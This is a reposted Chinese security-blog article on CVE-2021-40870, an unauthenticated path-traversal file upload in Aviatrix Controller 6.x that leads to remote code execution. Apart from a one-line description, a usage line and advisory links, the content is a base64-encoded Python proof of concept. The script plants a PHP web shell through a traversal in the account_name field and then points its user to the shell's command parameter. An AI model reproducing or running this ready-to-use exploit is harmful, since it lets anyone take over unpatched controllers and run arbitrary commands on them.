前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2021-40870 Aviatrix Controller RCE

CVE-2021-40870 Aviatrix Controller RCE

作者头像
Khan安全团队
发布2021-10-25 14:43:25
9470
发布2021-10-25 14:43:25
举报
文章被收录于专栏:Khan安全团队
在 6.5-1804.1922 之前的 Aviatrix Controller 6.x ,可以不受限制地上传具有危险类型的文件,这允许未经身份验证的用户通过目录遍历执行任意代码。

要运行这个项目,你需要在你的 python 中添加以下模块

代码语言:javascript
复制
requests urllib3
python3 poc.py https://site.com/

aW1wb3J0IHJlcXVlc3RzDQppbXBvcnQganNvbg0KaW1wb3J0IHN5cw0KaW1wb3J0IHRpbWUNCmZyb20gcmVxdWVzdHMucGFja2FnZXMgaW1wb3J0IHVybGxpYjMNCg0KdXJsbGliMy5kaXNhYmxlX3dhcm5pbmdzKHVybGxpYjMuZXhjZXB0aW9ucy5JbnNlY3VyZVJlcXVlc3RXYXJuaW5nKQ0KDQpiYW5uZXIgPSAmIzM5OyYjMzk7JiMzOTsNCiAgIF9fXyAgICAgICAgIF9fICAgIF9fX18gICBfX18gX19fXyAgXyAgICAgICBfICBfICAgIF9fXyAgIF9fXyBfX19fXyBfX18gIA0KICAvIF9fXC9cICAgL1wvX19cICB8X19fIFwgLyBfIFxfX18gXC8gfCAgICAgfCB8fCB8ICAvIF8gXCAoIF8gKV9fXyAgLyBfIFwgDQogLyAvICAgXCBcIC8gL19cX19fX18gX18pIHwgfCB8IHxfXykgfCB8X19fX198IHx8IHxffCB8IHwgfC8gXyBcICAvIC8gfCB8IHwNCi8gL19fXyAgXCBWIC8vX3xfX19fXy8gX18vfCB8X3wgLyBfXy98IHxfX19fX3xfXyAgIF98IHxffCB8IChfKSB8LyAvfCB8X3wgfA0KXF9fX18vICAgXF8vXF9fLyAgICB8X19fX198XF9fXy9fX19fX3xffCAgICAgICAgfF98ICBcX19fLyBcX19fLy9fLyAgXF9fXy8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgW2J5IDB4QWd1bl0NCiAgICAgICAgICAgICAgICAgICAgIFVzZSA6IHB5dGhvbjMgcG9jLnB5IGh0dHBzOi8vc2l0ZS5jb20vDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiYjMzk7JiMzOTsmIzM5Ow0KcHJpbnQoYmFubmVyKQ0KDQpiYXNlX3VybCA9IHN5cy5hcmd2WzFdDQp1c2VyID0gJiMzOTsmIzM5OyYjMzk7TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzcwLjAuMzUzOC43NyBTYWZhcmkvNTM3LjM2JiMzOTsmIzM5OyYjMzk7DQpmaWxlbmFtZSA9ICJSQ0UucGhwIg0Kc2hlbGwgPSAmIzM5OyYjMzk7JiMzOTsmbHQ7P3BocCBpZihpc3NldCgkX1JFUVVFU1RbJiMzOTtjbWQmIzM5O10pKXsgZWNobyAiJmx0O3ByZSZndDsiOyAkY21kID0gKCRfUkVRVUVTVFsmIzM5O2NtZCYjMzk7XSk7IHN5c3RlbSgkY21kKTsgZWNobyAiJmx0Oy9wcmUmZ3Q7IjsgZGllOyB9PyZndDsmIzM5OyYjMzk7JiMzOTsNCmlmIGJhc2VfdXJsLnN0YXJ0c3dpdGgoJiMzOTtodHRwczovLyYjMzk7KToNCiAgICBrID0gYmFzZV91cmwucmVwbGFjZSgiaHR0cHM6Ly8iLCAiIikNCiAgICBpZiBrLmVuZHN3aXRoKCIvIik6DQogICAgICAgIHAgPSBrLnJlcGxhY2UoIi8iLCAiIikNCg0KaGVhZGVycyA9IHsNCiAgICAiSG9zdCI6IHAsDQogICAgIlVzZXItQWdlbnQiOiB1c2VyLA0KICAgICJDb25uZWN0aW9uIjogImNsb3NlIiwNCiAgICAiQ29udGVudC1MZW5ndGgiOiAiMTA5IiwNCiAgICAiQ29udGVudC1UeXBlIjogImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIsDQogICAgIkFjY2VwdC1FbmNvZGluZyI6ICJnemlwIiwNCg0KfQ0KDQpib2R5ID0gZiYjMzk7Q0lEPXgmYWN0aW9uPXNldF9tZXRyaWNfZ3dfc2VsZWN0aW9ucyZhY2NvdW50X25hbWU9Ly4uLy4uLy4uL3Zhci93d3cvcGhwL3tmaWxlbmFtZX0mZGF0YT1wb2MgYnkgYWd1bntzaGVsbH0mIzM5Ow0KDQoNCnIgPSByZXF1ZXN0cy5wb3N0KGJhc2VfdXJsKyYjMzk7L3YxL2JhY2tlbmQxJiMzOTssIGhlYWRlcnM9aGVhZGVycywgZGF0YT1ib2R5LCB2ZXJpZnk9RmFsc2UpDQoNCmNoZWNrX2ZpbGUgPSByZXF1ZXN0cy5nZXQoYmFzZV91cmwrJiMzOTsvdjEvJiMzOTsrZmlsZW5hbWUsIHZlcmlmeT1GYWxzZSkNCmlmIGNoZWNrX2ZpbGUuc3RhdHVzX2NvZGUgPT0gMjAwOg0KICAgIHByaW50KGYmIzM5O0VYUExPSVRFRCB7YmFzZV91cmx9JiMzOTspDQogICAgcHJpbnQoJiMzOTsmIzM5OykNCiAgICBwcmludChmJiMzOTtHbyBUbyB7YmFzZV91cmx9L3YxL3tmaWxlbmFtZX0mIzM5OykNCiAgICBwcmludCgmIzM5OyYjMzk7KQ0KICAgIHByaW50KCYjMzk7YWNjZXNzIHNoZWxsIHVzaW5nIFJDRS5waHA/Y21kPVtjb21tYW5kXSYjMzk7KQ0KZWxzZToNCiAgICBwcmludCgiU29ycnkgRHVkZSBCYWQgbHVjayIp

  • http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html
  • https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
  • https://wearetradecraft.com/advisories/tc-2021-0002/

------------------------------------------------------------------------------

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-10-14,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 在 6.5-1804.1922 之前的 Aviatrix Controller 6.x ,可以不受限制地上传具有危险类型的文件,这允许未经身份验证的用户通过目录遍历执行任意代码。
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档